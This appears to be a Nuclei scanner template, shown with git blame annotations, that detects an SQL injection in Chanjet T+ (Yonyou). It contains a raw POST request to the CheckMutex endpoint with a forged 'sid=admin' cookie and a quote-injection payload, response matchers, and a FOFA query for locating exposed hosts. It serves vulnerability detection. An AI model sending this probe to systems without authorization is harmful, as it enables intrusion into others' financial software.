nuclei-templates/http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sq...

id: chanjet-tplus-checkmutex-sqli

info:
  name: Chanjet Tplus CheckMutex - SQL Injection
  author: unknown
  severity: high
  description: |
    There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou.
  reference:
    - https://github.com/MrWQ/vulnerability-paper/blob/7551f7584bd35039028b1d9473a00201ed18e6b2/bugs/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91%E7%94%A8%E5%8F%8B%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20SQL%20%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="畅捷通-TPlus"
  tags: chanjet,tplus,sqli

http:
  - raw:
      - |
        POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/plain
        Cookie: ASP.NET_SessionId=; sid=admin

        {"accNum": "6'", "functionTag": "SYS0104", "url": ""}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'order by begintime'
          - '"value":'
        condition: and

      - type: word
        part: header
        words:
          - "text/plain"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100be57649ccbef7deba029c5f75f6f74e949efa91f0676e3ea3ba7e983ccaff85502200ce258fef65a638c3c90db5543a66b603daef3c73c9c2c0425f6376ab1fd137f:922c64590222798bb761d5b6d8e72950
Added some Templates 2023-08-18 03:22:06 +00:00			`id: chanjet-tplus-checkmutex-sqli`

			`info:`
Templates - update 2023-09-15 12:23:57 +00:00			`name: Chanjet Tplus CheckMutex - SQL Injection`
Added some Templates 2023-08-18 03:22:06 +00:00			`author: unknown`
Templates - update 2023-09-15 12:23:57 +00:00			`severity: high`
Added some Templates 2023-08-18 03:22:06 +00:00			`description: \|`
			`There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou.`
			`reference:`
Templates - update 2023-09-15 12:23:57 +00:00			`- https://github.com/MrWQ/vulnerability-paper/blob/7551f7584bd35039028b1d9473a00201ed18e6b2/bugs/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91%E7%94%A8%E5%8F%8B%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20SQL%20%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md`
			`metadata:`
			`verified: true`
templateman update 2023-10-14 11:27:55 +00:00			`max-request: 1`
template update 2023-09-18 12:37:42 +00:00			`fofa-query: app="畅捷通-TPlus"`
			`tags: chanjet,tplus,sqli`
Added some Templates 2023-08-18 03:22:06 +00:00
			`http:`
			`- raw:`
			`- \|`
			`POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: text/plain`
			`Cookie: ASP.NET_SessionId=; sid=admin`

			`{"accNum": "6'", "functionTag": "SYS0104", "url": ""}`
Templates - update 2023-09-15 12:23:57 +00:00
template update 2023-09-18 12:37:42 +00:00			`matchers-condition: and`
Added some Templates 2023-08-18 03:22:06 +00:00			`matchers:`
			`- type: word`
Templates - update 2023-09-15 12:23:57 +00:00			`part: body`
Added some Templates 2023-08-18 03:22:06 +00:00			`words:`
template update 2023-09-18 12:37:42 +00:00			`- 'order by begintime'`
			`- '"value":'`
			`condition: and`

			`- type: word`
			`part: header`
			`words:`
			`- "text/plain"`
Templates - update 2023-09-15 12:23:57 +00:00
			`- type: status`
			`status:`
templateman update 2023-10-14 11:27:55 +00:00			`- 200`
Auto Template Signing [Thu Oct 19 13:13:50 UTC 2023] :robot: 2023-10-19 13:13:52 +00:00			`# digest: 4a0a00473045022100be57649ccbef7deba029c5f75f6f74e949efa91f0676e3ea3ba7e983ccaff85502200ce258fef65a638c3c90db5543a66b603daef3c73c9c2c0425f6376ab1fd137f:922c64590222798bb761d5b6d8e72950`